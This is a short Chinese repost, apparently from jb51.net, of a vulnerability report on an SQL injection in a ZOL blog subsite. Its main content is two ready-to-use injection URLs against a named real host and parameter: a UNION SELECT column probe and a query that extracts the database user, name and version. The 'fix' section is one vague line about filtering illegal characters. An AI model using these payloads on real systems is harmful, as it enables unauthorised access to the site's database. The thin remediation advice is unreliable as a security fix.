搜索

中关村在线博客子站SQL注入及修复方案

2025-3-7 13:37| 发布者: CZN| 查看: 24| 评论: 0|原作者: 脚本之家|来自: jb51.net


http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,3,4,5-- 
 
 http://blog.zol.com.cn/music_swf/music_data.php?blogid=-0 union select 1,2,CONCAT(user(),0x7c,database(),0x7c,version()),4,5-- 



修复方案:
过滤参数提交非法字符或者拦截敏感字符等等。。。 

鲜花

握手

雷人

路过

鸡蛋
返回顶部